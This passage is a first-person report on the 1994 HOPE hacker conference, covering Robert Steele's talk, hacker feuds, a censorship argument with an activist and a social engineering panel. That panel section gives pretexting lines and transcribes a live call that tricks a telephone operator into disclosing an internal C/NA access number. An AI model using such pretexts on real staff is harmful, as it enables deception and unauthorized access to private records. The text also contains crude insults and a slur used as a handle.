hall, and within 90 seconds he took over the podium and began
|
|||
|
speaking.
|
|||
|
|
|||
|
"I bet you've always wanted to ask a spy a few questions. Here's
|
|||
|
your chance. But let me say that the United States intelligence
|
|||
|
community needs help and you guys are part of the solution." The
|
|||
|
MIB was impeccably dressed in his pin stripe with only traces of
|
|||
|
a Hackers 80 T-shirt leaking through his starched white dress
|
|||
|
shirt. The MIB is no less than Robert Steele, ex-CIA type spy,
|
|||
|
senior civilian in Marine Corps Intelligence and now the Presi
|
|||
|
dent of Open Source Solutions, Inc.
|
|||
|
|
|||
|
He got these guys (and gals) going. Robert doesn't mince words
|
|||
|
and that's why as he puts it, he's "been adopted by the hackers."
|
|||
|
At his OSS conferences he has successfully juxtaposed hackers and
|
|||
|
senior KGB officials who needed full time security during their
|
|||
|
specially arranged 48 hour visa to Washington, DC. He brought
|
|||
|
Emmanuel and Rop and clan to his show and since their agendas
|
|||
|
aren't all that different, a camaraderie was formed.
|
|||
|
|
|||
|
Robert MIB Steele believes that the current intelligence machin
|
|||
|
ery is inadequate to meet the challenges of today's world. Over
|
|||
|
80% of the classified information contained with the Byzantine
|
|||
|
bowels of the government is actually available from open sources.
|
|||
|
We need to realize that the future is more of an open book than
|
|||
|
ever before.
|
|||
|
|
|||
|
We classify newspaper articles from Peru in the incredibly naive
|
|||
|
belief that only Pentagon spooks subscribe. We classify BBC
|
|||
|
video tapes from the UK with the inane belief that no one will
|
|||
|
watch it if it so stamped. We classify $4 Billion National
|
|||
|
Reconnaissance Office satellite generated street maps of Calle,
|
|||
|
Colombia when anyone with an IQ only slightly above a rock can
|
|||
|
get the same one from the tourist office. And that's where
|
|||
|
hackers come in.
|
|||
|
|
|||
|
"You guys are a national resource. Too bad everyone's so scared
|
|||
|
of you." Applause from everywhere. The MIB knows how to massage
|
|||
|
a crowd. Hackers, according to Steele, and to a certain extent I
|
|||
|
agree, are the truth tellers "in a constellation of complex
|
|||
|
systems run amok and on the verge of catastrophic collapse."
|
|||
|
|
|||
|
Hackers are the greatest sources of open source information in
|
|||
|
the world. They have the navigation skills, they have the time,
|
|||
|
and they have the motivation, Robert says. Hackers peruse the
|
|||
|
edges of technology and there is little that will stop them in
|
|||
|
their efforts. The intelligence community should take advantage
|
|||
|
of the skills and lessons that the hackers have to teach us, yet
|
|||
|
as we all know, political and social oppositions keep both sides
|
|||
|
(who are really more similar then dissimilar) from talking.
|
|||
|
|
|||
|
"Hackers put a mirror up to the technical designers who have
|
|||
|
built the networks, and what they see, they don't like. Hackers
|
|||
|
have shown us all the chinks in the armor of a house without
|
|||
|
doors or windows. The information infrastructure is fragile and
|
|||
|
we had better do something about it now; before it's too late."
|
|||
|
|
|||
|
Beat them at their own game, suggests Steele. Keep the doors of
|
|||
|
Cyberspace open, and sooner or later, the denizens of the black
|
|||
|
holes of information will have to sooner or late realize that the
|
|||
|
cat is out of the bag.
|
|||
|
|
|||
|
Steele educated the Hacker crowd in a way new to them: he treat
|
|||
|
ed them with respect, and in turn he opened a channel of dialog
|
|||
|
that few above ground suit-types have ever envisioned. Steele
|
|||
|
works at the source.
|
|||
|
|
|||
|
HOPE had begun and Robert had set the tone.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
The day was long. Dogged by press, hackers rolled over so the
|
|||
|
reporters could tickle their stomachs on camera. Despite their
|
|||
|
public allegations that the media screws it up and never can get
|
|||
|
the story right, a camera is like a magnet. The New York Times
|
|||
|
printed an article about HOPE so off the wall I wondered if the
|
|||
|
reporter had actually been there. Nonetheless, the crowds fol
|
|||
|
lowed the cameras, the cameras followed the crowds, and the
|
|||
|
crowds parted like the Red Sea. But these were mighty colorful
|
|||
|
crowds.
|
|||
|
|
|||
|
We all hear of that prototypical image of the acne faced, Jolt-
|
|||
|
drinking, pepperoni downing nerdish teenager who has himself
|
|||
|
locked in the un-air-conditioned attic of his parents' half
|
|||
|
million dollar house from the time school gets out till the sun
|
|||
|
rises. Wrongo security-breath. Yeah, there's that component, but
|
|||
|
I was reminded of the '80's, the early '80's by a large percent
|
|||
|
age of the crowd.
|
|||
|
|
|||
|
Purple hair was present but scarce, and I swear on a stack of
|
|||
|
2600's that Pat from Saturday Night Live was there putting every
|
|||
|
one's hormonal guess-machines to the test. But what cannot help
|
|||
|
but capture one's attention is a 40 pin integrated circuit in
|
|||
|
serted into the shaved side skull of an otherwise clean-cut
|
|||
|
Mohawk haircut.
|
|||
|
|
|||
|
The story goes that Chip Head went to a doctor and had a pair of
|
|||
|
small incisions placed in his skull which would hold the leads
|
|||
|
from the chip. A little dab of glue and in a few days the skin
|
|||
|
would grow back to hold the 40 pins in the natural way; God's
|
|||
|
way.
|
|||
|
|
|||
|
There was a time that I thought ponytails were 'out' and passe,
|
|||
|
but I thought wrong. Mine got chopped off in roughly 1976 down
|
|||
|
to shoulder length which remained for another six years, but half
|
|||
|
of the HOPE audience is the reason for wide spread poverty in the
|
|||
|
hair salon industry.
|
|||
|
|
|||
|
Nothing wrong with long, styled, inventive, outrageous hair as
|
|||
|
long as it's clean; and with barely an exception, such was the
|
|||
|
case. In New York it's not too hard to be perceived as clean,
|
|||
|
especially when you consider the frame of reference. Nothing is
|
|||
|
too weird.
|
|||
|
|
|||
|
The energy level of HOPE was much higher than the almost lethar
|
|||
|
gic (but good!) DefCon II. People move in a great hurry, perhaps
|
|||
|
to convey the sense of importance to others, or just out of
|
|||
|
frenetic hyperactivity. Hackers hunched over their keyboards -
|
|||
|
yet with a sense of urgency and purpose. Quiet yet highly animat
|
|||
|
ed conversations in all corners. HOPE staff endlessly pacing
|
|||
|
throughout the event with their walkie-talkies glued to their
|
|||
|
ears.
|
|||
|
|
|||
|
Not many suit types. A handful at best, and what about the Feds?
|
|||
|
I was accosted a few times for being a Fed, but word spread: no
|
|||
|
Fed, no bust. Where were the Feds? In the lobby. The typical
|
|||
|
NYPD cop has the distinctive reputation of being overweight
|
|||
|
especially when he wearing two holsters - one for the gun and one
|
|||
|
for the Italian sausage. Perpetually portrayed as donut dunking
|
|||
|
dodo's, some New York cops' asses are referred to as the Fourth
|
|||
|
Precinct and a few actually moonlight as sofas.
|
|||
|
|
|||
|
So rather than make a stink, (NY cops hate to make a scene) the
|
|||
|
lobby of the Hotel Filthadelphia was home to the Coffee Clutch
|
|||
|
for Cops. About a half dozen of them made their profound
|
|||
|
presence known by merely spending their day consuming mass quan
|
|||
|
tities of questionable ingestibles, but that was infinitely
|
|||
|
preferable to hanging out on the 18th floor. The hackers weren't
|
|||
|
causing any trouble, the cops knew that, so why push it. Hackers
|
|||
|
don't fight, they hack. Right?
|
|||
|
|
|||
|
After hours of running hours behind schedule, the HOPE conference
|
|||
|
was in first place for disorganized, with DefCon II not far
|
|||
|
behind. Only with 1000 people to keep happy and in the right
|
|||
|
rooms, chaos reigns sooner. The free Unix sessions and Pager
|
|||
|
session and open microphone bitch session and the unadulterated
|
|||
|
true history of 2600 kept audiences of several hundred hankering
|
|||
|
for more - hour after hour.
|
|||
|
|
|||
|
Over by the cellular hacking demonstrations, I ran into a hacker
|
|||
|
I had written about: Julio, from the almost defunct Masters of
|
|||
|
Destruction. Julio had gone state's evidence and was prepared to
|
|||
|
testify against MoD ring leader Mark Abene (aka Phiber Optik) but
|
|||
|
once Mark pled guilty to enough crimes to satisfy the Feds, Julio
|
|||
|
was off the hook with mere probation. Good guy, sworn off of
|
|||
|
hacking. Cell phones are so much more interesting.
|
|||
|
|
|||
|
However, while standing around with Erikb and a gaggle of Cyber
|
|||
|
Christ wanna-bes, Julio and his friend (who was the size of Texas
|
|||
|
on two legs) began a pushing match with Goggans. "You fucking
|
|||
|
narc red-neck son of a bitch." Goggans helped build the case
|
|||
|
against the MoD and didn't make a lot of friends in the process.
|
|||
|
|
|||
|
The shoving and shouldering reminded me of slam dancing from
|
|||
|
decades past, but these kids are too young to have taken part in
|
|||
|
the social niceties of deranged high speed propulsion and revul
|
|||
|
sion on the dance floor. So it was a straight out pushing match,
|
|||
|
which found Erikb doing his bloody best to avoid. Julio and pal
|
|||
|
kept a'coming and Erikb kept avoiding. It took a dozen of us to
|
|||
|
get in the middle and see that Julio was escorted to the eleva
|
|||
|
tors.
|
|||
|
|
|||
|
Julio said Corrupt, also of the MoD, was coming down to HOPE,
|
|||
|
too. Corrupt has been accused of mugging drug dealers to finance
|
|||
|
his computer escapades, and was busted along with the rest of the
|
|||
|
MoD gang. The implied threat was taken seriously, but, for
|
|||
|
whatever reason, Corrupt never showed. It is said that the
|
|||
|
majority of the hacking community distances itself from him; he's
|
|||
|
not good for the collective reputation. So much for hacker
|
|||
|
fights. All is calm.
|
|||
|
|
|||
|
The evening sessions continued and continued with estimates of as
|
|||
|
late as 4AM being bandied about. Somewhere around 1:00AM I ran
|
|||
|
into Bootleg in the downstairs bar. Where was everybody? Not
|
|||
|
upstairs. Not in the bar. I saw a Garbage Heap in the street
|
|||
|
outside (now that's a double entendre) and then Goggans popped up
|
|||
|
from the door of the Blarney Stone, a syndicated chain of low-
|
|||
|
class Irish bars that serve fabulously thick hot sandwiches.
|
|||
|
|
|||
|
"We're about to get thrown out."
|
|||
|
|
|||
|
"From the Blarney Stone? That's impossible. Drunks call the
|
|||
|
phone booths home!"
|
|||
|
|
|||
|
Fifty or so hacker/phreaks had migrated to the least likely, most
|
|||
|
anachronistic location one could imagine. A handful of drunken
|
|||
|
sots leaning over their beers on a stain encrusted wooden breed
|
|||
|
ing ground for salmonella. A men's room that hasn't seen the
|
|||
|
fuzzy end of a brush for the best part of a century made Turkish
|
|||
|
toilets appear refreshingly clean. And they serve food here.
|
|||
|
|
|||
|
I didn't look like a hacker so I asked the bartender, "Big crowd,
|
|||
|
eh?"
|
|||
|
|
|||
|
The barrel chested beer bellied barman nonchalantly replied,
|
|||
|
"nah. Pretty usual." He cleaned a glass so thoroughly the water
|
|||
|
marks stood out plainly.
|
|||
|
|
|||
|
"Really? This much action on a Saturday night on a dark side
|
|||
|
street so questionably safe that Manhattan's Mugger Society posts
|
|||
|
warnings?"
|
|||
|
|
|||
|
"Yup."
|
|||
|
|
|||
|
"So," I continued. "These hackers come here a lot?"
|
|||
|
|
|||
|
"Sure do," he said emphatically.
|
|||
|
|
|||
|
"Wow. I didn't know that. So this is sort of a hacker bar, you
|
|||
|
might say?"
|
|||
|
|
|||
|
"Exactly. Every Saturday night they come in and raise a little
|
|||
|
hell."
|
|||
|
|
|||
|
With a straight face I somehow managed to thank the confused
|
|||
|
barman for his help and for the next four hours learned that
|
|||
|
socially, hackers of today are no different than many if not most
|
|||
|
of us were in our late teens ad early twenties. We laughed and
|
|||
|
joked and so do they - but there is more computer talk. We
|
|||
|
decried the political status of our day as they do theirs, albeit
|
|||
|
they with less fervor and more resignation. The X-Generation
|
|||
|
factor: most of them give little more than a tiny shit about
|
|||
|
things they view as being totally outside their control, so why
|
|||
|
bother. Live for today.
|
|||
|
|
|||
|
Know they enemy. Robert hung in with me intermingling and argu
|
|||
|
ing and debating and learning from them, and they from us.
|
|||
|
Hackers aren't the enemy - their knowledge is - and they are not
|
|||
|
the exclusive holders of that information. Information Warfare
|
|||
|
is about capabilities, and no matter who possesses that capabili
|
|||
|
ty, there ought to be a corresponding amount respect.
|
|||
|
|
|||
|
Indeed, rather than adversaries, hackers could well become gov
|
|||
|
ernment allies and national security assets in an intense inter
|
|||
|
national cyber-conflict. In the LoD/MoD War of 1990-91, one
|
|||
|
group of hackers did help authorities. Today many hackers assist
|
|||
|
professional organizations, governments in the US and overseas -
|
|||
|
although very quietly. 'Can't be seen consorting with the
|
|||
|
enemy.' Is hacking from an Army or Navy or NATO base illegal?
|
|||
|
Damned if I know, but more than one Cyber Christ-like character
|
|||
|
makes a tidy sum providing hands-on hacking education to the
|
|||
|
brass in Europe.
|
|||
|
|
|||
|
Where these guys went after 5AM I don't know, but I was one of
|
|||
|
the first to be back at the HOPE conference later that day; 12:30
|
|||
|
PM Sunday.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
The Nazi Hunters were out in force.
|
|||
|
|
|||
|
"The Neo-Nazi skinheads are trying to start another Holocaust." A
|
|||
|
piercing, almost annoying voice stabbed right through the crowds.
|
|||
|
"Their racist propaganda advocates killing Jews and blacks. They
|
|||
|
have to be stopped, now."
|
|||
|
|
|||
|
Mortechai Levy (I'll call him Morty) commanded the attention of a
|
|||
|
couple dozen hackers. Morty was a good, emotional, riveting
|
|||
|
shouter. "These cowardly bastards have set up vicious hate call
|
|||
|
lines in over 50 cities. The messages advocate burning syna
|
|||
|
gogues, killing minorities and other violence. These phones have
|
|||
|
to be stopped!"
|
|||
|
|
|||
|
The ever-present leaflet from Morty's Jewish Defense Organization
|
|||
|
asked for help from the 2600 population.
|
|||
|
|
|||
|
"Phone freaks you must use your various assorted bag of
|
|||
|
tricks to shut these lines down. No cowardly sputterings
|
|||
|
about 'free speech' for these fascist scum."
|
|||
|
|
|||
|
The headline invited the hacker/phreak community to:
|
|||
|
|
|||
|
"Let's Shut Down 'Dial-A-Nazi'!!!"
|
|||
|
|
|||
|
Morty was looking for political and technical support from a band
|
|||
|
of nowhere men and women who largely don't know where they're
|
|||
|
going much less care about an organized political response to
|
|||
|
someone elses cause. He wasn't making a lot of headway, and he
|
|||
|
must have know that he would walk right into the anarchist's
|
|||
|
bible: the 1st amendment.
|
|||
|
|
|||
|
The battle lines had been set. Morty wanted to see the Nazis
|
|||
|
censored and hackers are absolute freedom of speechers by any
|
|||
|
measure. Even Ben sauntering over for a group hug did little to
|
|||
|
defuse the mounting tension.
|
|||
|
|
|||
|
I couldn't help but play mediator. Morty was belligerently loud
|
|||
|
and being deafeningly intrusive which affected the on-going ses
|
|||
|
sions. To tone it down some, we nudged Morty and company off to
|
|||
|
the side and occupied a corner of thread bare carpet, leaning
|
|||
|
against a boorish beige wall that had lost its better epidermis.
|
|||
|
|
|||
|
The heated freedom of speech versus the promotion of racial
|
|||
|
genocide rancor subdued little even though we were all buns side
|
|||
|
down. I tried to get a little control of the situation.
|
|||
|
|
|||
|
"Morty. Answer me this so we know where you're coming from. You
|
|||
|
advocate the silencing of the Nazis, right?
|
|||
|
|
|||
|
"They're planning a new race war; they have to be stopped."
|
|||
|
|
|||
|
"So you want them silenced. You say their phones should be
|
|||
|
stopped and that the hackers should help."
|
|||
|
|
|||
|
"Call that number and they'll tell you that Jews and blacks
|
|||
|
should be killed and then they . . ."
|
|||
|
|
|||
|
"Morty. OK, you want to censor the Nazis. Yes or No."
|
|||
|
|
|||
|
"Yes."
|
|||
|
|
|||
|
"OK, I can understand that. The question really is, and I need
|
|||
|
your help here, what is the line of censorship that you advocate.
|
|||
|
Where is your line of legal versus censored?"
|
|||
|
|
|||
|
A few more minutes of political diatribe and then he got to the
|
|||
|
point. "Any group with a history of violence should be censored
|
|||
|
and stopped." A little imagination and suddenly the whole planet
|
|||
|
is silenced. We need a better line, please. "Hate group, Nazis,
|
|||
|
people who advocate genocide . . . they should be
|
|||
|
silenced . . . ."
|
|||
|
|
|||
|
"So," I analyzed. "You want to establish censorship criteria
|
|||
|
based upon subjective interpretation. Whose interpretation?"
|
|||
|
My approach brought nods of approval.
|
|||
|
|
|||
|
One has to admire Morty and his sheer audacity and tenacity and
|
|||
|
how much he strenuously and single-mindedly drives his points
|
|||
|
home. He didn't have the ideal sympathetic audience, but he
|
|||
|
wouldn't give an inch. Not an inch. A little self righteousness
|
|||
|
goes a long way; boisterous extremism grows stale. It invites
|
|||
|
punitive retorts and teasing, or in counter-culture jargon,
|
|||
|
"fucking with their heads."
|
|||
|
|
|||
|
Morty (perhaps for justifiable reasons) was totally inflexible
|
|||
|
and thus more prone to verbal barbing. "You're just a Jewish
|
|||
|
racist. Racism in reverse," accused one jocular but definitely
|
|||
|
lower middle class hacker with an accent thicker than all of
|
|||
|
Brooklyn.
|
|||
|
|
|||
|
Incoming Scuds! Look out! Morty went nuts and as they say,
|
|||
|
freedom of speech ends when my fists impacts upon your nose.
|
|||
|
Morty came dangerously close to crossing that line. Whoah,
|
|||
|
Morty, whoah. He's just fucking with your head. The calm-down
|
|||
|
brigade did its level best to keep these two mortals at opposite
|
|||
|
ends of the room.
|
|||
|
|
|||
|
"You support that Neo Nazi down there; you're as bad as the
|
|||
|
rest!" Morty said. "See what I have to tolerate. I know him,
|
|||
|
we've been keeping track of him and he hangs out with the son of
|
|||
|
the Grand Wizard of Nazi Oz." The paranoid train got on the
|
|||
|
tracks.
|
|||
|
|
|||
|
"Do you really know the Big Poo-bah of Hate?" I asked the hacker
|
|||
|
under assault and now under protective custody.
|
|||
|
|
|||
|
"Yeah," he said candidly. "He's some dick head who hates every
|
|||
|
one. Real jerk."
|
|||
|
|
|||
|
"So what about you said to Morty over there?"
|
|||
|
|
|||
|
"Just fucking with his head. He gets a little extreme." So we
|
|||
|
had in our midst the Al Sharpton of the Jewish faith. Ballsy.
|
|||
|
Since Morty takes Saturday's off by religious law, he missed the
|
|||
|
press cavalcade, but as a radical New York fixture, the media
|
|||
|
probably didn't mind too much.
|
|||
|
|
|||
|
I was off to sessions, Morty found new audiences as they came off
|
|||
|
the elevators, and the band played on.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
In my humble 40-something opinion, the best session of HOPE was
|
|||
|
the one on social engineering.
|
|||
|
|
|||
|
The panel consisted of only Emmanuel, Supernigger (social engi
|
|||
|
neer par excellence) and Cheshire Catalyst. The first bits were
|
|||
|
pretty staid dry conventional conference (ConCon) oriented, but
|
|||
|
nonetheless, not the kind of info that you expect to find William
|
|||
|
H. Murray, Executive Consultant handing out.
|
|||
|
|
|||
|
The best social engineers make friends of their victims. Remem
|
|||
|
ber: you're playing a role. Think Remington Steele.
|
|||
|
|
|||
|
Schmooze! "Hey, Jack did you get a load of the blond on Stern
|
|||
|
last night?"
|
|||
|
|
|||
|
Justifiable anger: "Your department has caused nothing but head
|
|||
|
aches. These damn new computers/phones/technology just don't
|
|||
|
work like the old ones. Now either you help me now or I'm going
|
|||
|
all the way to Shellhorn and we'll what he says about these kinds
|
|||
|
of screwups." A contrite response is the desired effect.
|
|||
|
|
|||
|
Butt headed bosses: "Hey, my boss is all over my butt, can you
|
|||
|
help me out?"
|
|||
|
|
|||
|
Management hatred: "I'm sitting here at 3PM working while man
|
|||
|
agement is on their yachts. Can you tell me . . .?"
|
|||
|
|
|||
|
Giveaways: "Did you know that so and so is having an affair with
|
|||
|
so and so? It's true, I swear. By the way, can you tell me how
|
|||
|
to . . ."
|
|||
|
|
|||
|
Empathy: "I'm new, haven't been to the training course and they
|
|||
|
expect me to figure this out all by myself. It's not fair."
|
|||
|
|
|||
|
Thick Accent: "Hi. Dees computes haf big no wurk. Eet no makedah
|
|||
|
passurt. Cunu help? Ah, tanku." Good for a quick exchange and a
|
|||
|
quick good-bye. Carefully done, people want you off the phone
|
|||
|
quickly.
|
|||
|
|
|||
|
Billsf, the almost 40 American phreak who now calls Amsterdam
|
|||
|
home was wiring up Supernigger's real live demonstration of
|
|||
|
social engineering against Sprint. A dial tone came over the PA
|
|||
|
system followed by the pulses to 411.
|
|||
|
|
|||
|
"Directory Assistance," the operator's male voice was squeezed
|
|||
|
into a mere three kilohertz bandwidth.
|
|||
|
|
|||
|
Suddenly, to the immense pleasure of the audience, an ear-split
|
|||
|
ting screech a thousand times louder than finger nails on a chalk
|
|||
|
board not only belched across the sound system but caused instant
|
|||
|
bleeding in the ears of the innocent but now deaf operator. .
|
|||
|
Billsf sheepishly grinned. "Just trying to wire up a mute
|
|||
|
button."
|
|||
|
|
|||
|
Three hundred people in unison responded: "It doesn't work." No
|
|||
|
shit.
|
|||
|
|
|||
|
While Billsf feverishly worked to regain his reputation, Super
|
|||
|
nigger explained what he was going to do. The phone companies
|
|||
|
have a service, ostensibly for internal use, called a C/NA. Sort
|
|||
|
of a reverse directory when you have the number but want to know
|
|||
|
who the number belongs to and from whence it comes. You can
|
|||
|
understand that this is not the sort of feature that the phone
|
|||
|
company wants to have in the hands of a generation of kids who
|
|||
|
are so apathetic that they don't even know they don't give a
|
|||
|
shit. Nonetheless, the access to this capability is through an
|
|||
|
800 number and a PIN.
|
|||
|
|
|||
|
Supernigger was going to show us how to acquire such privileged
|
|||
|
information. Live. "When you get some phone company person as
|
|||
|
dumb as a bolt on the other end, and you know a few buzz words.
|
|||
|
you convince them that it is in their best interest and that they
|
|||
|
are supposed to give you the information."
|
|||
|
|
|||
|
"I've never done this in front of an audience before, so give me
|
|||
|
three tries," he explained to an anxiously foaming at the mouth
|
|||
|
crowd. No one took a cheap pot shot at him: tacit acceptance of
|
|||
|
his rules.
|
|||
|
|
|||
|
Ring. Ring.
|
|||
|
|
|||
|
"Operations. Mary."
|
|||
|
|
|||
|
"Mary. Hi, this is Don Brewer in social engineering over at CIS,
|
|||
|
how's it going?" Defuse.
|
|||
|
|
|||
|
"Oh, fine. I guess."
|
|||
|
|
|||
|
"I know, I hate working Sundays. Been busy?"
|
|||
|
|
|||
|
"Nah, no more. Pretty calm. How can I help you?"
|
|||
|
|
|||
|
"I'm doing a verification and I got systems down. I just need
|
|||
|
the C/NA. You got it handy?" Long pause.
|
|||
|
|
|||
|
"Sure, lemme look. Ah, it's 313.424.0900." 700 notebooks ap
|
|||
|
peared out of nowhere, accompanied by the sound of 700 pens
|
|||
|
writing down a now-public phone number.
|
|||
|
|
|||
|
"Got it. Thanks." The audience is gasping at the stunningly
|
|||
|
stupid gullibility of Mary. But quiet was essential to the
|
|||
|
mission.
|
|||
|
|
|||
|
"Here's the PIN number while we're at it." Double gasp. She's
|
|||
|
offering the supposedly super secret and secure PIN number? Was
|
|||
|
this event legal? Had Supernigger gone over the line?
|
|||
|
|
|||
|
"No, CIS just came up. Thanks anyway."
|
|||
|
|
|||
|
"Sure you don't need it?"
|
|||
|
|
|||
|
"Yeah. Thanks. Bye." Click. No need to press the issue. PIN
|
|||
|
access might be worth a close look from the next computer DA
|
|||
|
wanna-be.
|
|||
|
|
|||
|
An instant shock wave of cacophonous approval worked its way
|
|||
|
throughout the 750 seat ballroom in less than 2 microseconds.
|
|||
|
Supernigger had just successfully set himself as a publicly
|
|||
|
ordained Cyber Christ of Social Engineering. His white robes
|
|||
|
were on the way. Almost a standing ovation lasted for the better
|
|||
|
part of a minute by everyone but the narcs in the audience. I
|
|||
|
don't know if they were telco or Feds of whatever, but I do know
|
|||
|
that they were the stupidest narcs in the city of New York. This
|
|||
|
pair of dour thirty something Republicans had sphincters so tight
|
|||
|
you could mine diamonds out of their ass.
|
|||
|
|
|||
|
Arms defiantly and defensively crossed, they were stupid enough
|
|||
|
to sit in the third row center aisle. They never cracked a smile
|
|||
|
at some of the most entertaining performances I have seen outside
|
|||
|
of the giant sucking sound that emanates from Ross Perot's ears.
|
|||
|
|
|||
|
Agree or disagree with hacking and phreaking, this was funny and
|
|||
|
unrehearsed ad lib material. Fools. So, for fun, I crawled over
|
|||
|
the legs of the front row and sat in the aisle, a bare eight feet
|
|||
|
from the narcs. Camera in hand I extended the 3000mm tele-photo
|
|||
|
lens which can distinguish the color of a mosquitoes underwear
|
|||
|
from a kilometer and pointed it in their exact direction. Their
|
|||
|
childhood acne scars appeared the depth of the Marianna Trench.
|
|||
|
Click, and the flash went off into their eyes, which at such a
|
|||
|
short distance should have caused instant blindness. But noth
|
|||
|
ing. No reaction. Nada. Cold as ice. Rather disappointing, but
|
|||
|
now we know that almost human looking narc-bots have been per
|
|||
|
fected and are being beta tested at hacker cons.
|
|||
|
|
|||
|
Emmanuel Goldstein is very funny. Maybe that's why Ed Markey and
|
|||
|
he get along so well. His low key voice rings of a gentler,
|
|||
|
kinder sarcasm but has a youthful charm despite that he is 30-
|
|||
|
something himself.
|
|||
|
|
|||
|
"Sometimes you have to call back. Sometimes you have to call
|
|||
|
over and over to get what you want. You have to keep in mind
|
|||
|
that the people at the other end of the phone are generally not
|
|||
|
as intelligent as a powered down computer." He proceeded to
|
|||
|
prove the point.
|
|||
|
|
|||
|
Ring ring,
|
|||
|
|
|||
|
"Directory Assistance."
|
|||
|
|
|||
|
"Hi."
|
|||
|
|
|||
|
"Hi."
|
|||
|
|
|||
|
"Hi."
|
|||
|
|
|||
|
"Can I help you."
|
|||
|
|
|||
|
"Yes."
|
|||
|
|
|||
|
Pause.
|
|||
|
|
|||
|
"Hello?"
|
|||
|
|
|||
|
"Hi."
|
|||
|
|
|||
|
"Hi."
|
|||
|
|
|||
|
"Can I help you.:
|
|||
|
|
|||
|
"OK."
|
|||
|
|
|||
|
Shhhhh. Ssshhh. Quiet. Shhhh. Too damned funny for words.
|
|||
|
|
|||
|
"Directory Assistance."
|
|||
|
|
|||
|
"I need some information."
|
|||
|
|
|||
|
"How can I help you."
|
|||
|
|
|||
|
"Is this where I get numbers?"
|
|||
|
|
|||
|
"What number would you like?"
|
|||
|
|
|||
|
"Information."
|
|||
|
|
|||
|
"This is information."
|
|||
|
|
|||
|
"You said directory assistance."
|
|||
|
|
|||
|
"This is."
|
|||
|
|
|||
|
"But I need information."
|
|||
|
|
|||
|
"What information do you need?"
|
|||
|
|
|||
|
"For information."
|
|||
|
|
|||
|
"This is information."
|
|||
|
|
|||
|
"What's the number?"
|
|||
|
|
|||
|
"For what?"
|
|||
|
|
|||
|
"Information."
|
|||
|
|
|||
|
"This is directory assistance."
|
|||
|
|
|||
|
"I need the number for information."
|
|||
|
|
|||
|
Pause. Pause.
|
|||
|
|
|||
|
"What number do you want?"
|
|||
|
|
|||
|
"For information."
|
|||
|
|
|||
|
Pause. Guffaws, some stifled, some less so. Funny stuff.
|
|||
|
|
|||
|
"Hold on please."
|
|||
|
|
|||
|
Pause.
|
|||
|
|
|||
|
"Supervisor. May I help you?"
|
|||
|
|
|||
|
"Hi."
|
|||
|
|
|||
|
"Hi."
|
|||
|
|
|||
|
Pause.
|
|||
|
|
|||
|
"Can I help you?"
|
|||
|
|
|||
|
"I need the number for information."
|
|||
|
|
|||
|
"This is directory assistance."
|
|||
|
|
|||
|
"Hi."
|
|||
|
|
|||
|
"Hi."
|
|||
|
|
|||
|
"What's the number for information?"
|
|||
|
|
|||
|
"This is information."
|
|||
|
|
|||
|
"What about directory assistance?"
|
|||
|
|
|||
|
"This is directory assistance."
|
|||
|
|
|||
|
"But I need information."
|
|||
|
|
|||
|
"This is information."
|
|||
|
|
|||
|
"Oh, OK. What's the number for information?"
|
|||
|
|
|||
|
Pause.
|
|||
|
|
|||
|
"Ah 411."
|
|||
|
|
|||
|
"That's it?"
|
|||
|
|
|||
|
"No. 555.1212 works too."
|
|||
|
|
|||
|
"So there's two numbers for information?"
|
|||
|
|
|||
|
"Yes."
|
|||
|
|
|||
|
"Which one is better?" How this audience kept its cool was
|
|||
|
beyond me. Me and my compatriots were beside ourselves.
|
|||
|
|
|||
|
Pause.
|
|||
|
|
|||
|
"Neither."
|
|||
|
|
|||
|
"Then why are there two?"
|
|||
|
|
|||
|
Pause.
|
|||
|
|
|||
|
"I don't know."
|
|||
|
|
|||
|
"OK. So I can use 411 or 555.1212."
|
|||
|
|
|||
|
"That's right."
|
|||
|
|
|||
|
"And which one should I use?"
|
|||
|
|
|||
|
Pause.
|
|||
|
|
|||
|
"411 is faster." Huge guffaws. Ssshhhh. Ssshhhh..
|
|||
|
|
|||
|
"Oh. What about the ones?"
|
|||
|
|
|||
|
"Ones?"
|
|||
|
|
|||
|
"The ones."
|
|||
|
|
|||
|
"Which ones?"
|
|||
|
|
|||
|
"The ones at the front of the number."
|
|||
|
|
|||
|
"Oh, those ones. You don't need ones. Just 411 or 555.1212.."
|
|||
|
|
|||
|
"My friends say they get to use ones." Big laugh. Shhhhhh.
|
|||
|
|
|||
|
"That's only for long distance."
|
|||
|
|
|||
|
"To where?" How does he keep a straight face?
|
|||
|
|
|||
|
Pause.
|
|||
|
|
|||
|
"If you wanted 914 information you'd use a one."
|
|||
|
|
|||
|
"If I wanted to go where?"
|
|||
|
|
|||
|
"To 914?"
|
|||
|
|
|||
|
"Where's that?"
|
|||
|
|
|||
|
"Westchester."
|
|||
|
|
|||
|
"Oh, Westchester. I have friends there."
|
|||
|
|
|||
|
Pause.
|
|||
|
|
|||
|
"Hello?"
|
|||
|
|
|||
|
"Yes?"
|
|||
|
|
|||
|
"So I use ones?"
|
|||
|
|
|||
|
"Yes. A one for the 914 area."
|
|||
|
|
|||
|
"How?"
|
|||
|
|
|||
|
Pause.
|
|||
|
|
|||
|
"Put a one before the number."
|
|||
|
|
|||
|
"Like 1914. Right?"
|
|||
|
|
|||
|
"1914.555.1212."
|
|||
|
|
|||
|
"All of those numbers?"
|
|||
|
|
|||
|
"Yes."
|
|||
|
|
|||
|
"That's three ones."
|
|||
|
|
|||
|
"That's the area code."
|
|||
|
|
|||
|
"I've heard about those. They confuse me." Rumbling chuckles
|
|||
|
and laughs throughout the hall.
|
|||
|
|
|||
|
Pause.
|
|||
|
|
|||
|
She slowly and carefully explained what an area code is to the
|
|||
|
howlingly irreverent amusement of the entire crowd except for the
|
|||
|
fool narcs.
|
|||
|
|
|||
|
"Thanks. So I can call information and get a number?"
|
|||
|
|
|||
|
"That's right."
|
|||
|
|
|||
|
"And there's two numbers I can use?"
|
|||
|
|
|||
|
"Yes."
|
|||
|
|
|||
|
"So I got two numbers on one call?"
|
|||
|
|
|||
|
"Yeah . . ."
|
|||
|
|
|||
|
"Wow. Thanks. Have a nice day."
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
Comments heard around HOPE.
|
|||
|
|
|||
|
Rop Gongrijjp, Hacktic: "The local phone companies use their own
|
|||
|
social engineers when they can't get their own people to tell
|
|||
|
them what they need to know."
|
|||
|
|
|||
|
Sprint is using what they consider to be the greatest access
|
|||
|
mechanism since the guillotine. For all of us road warriors out
|
|||
|
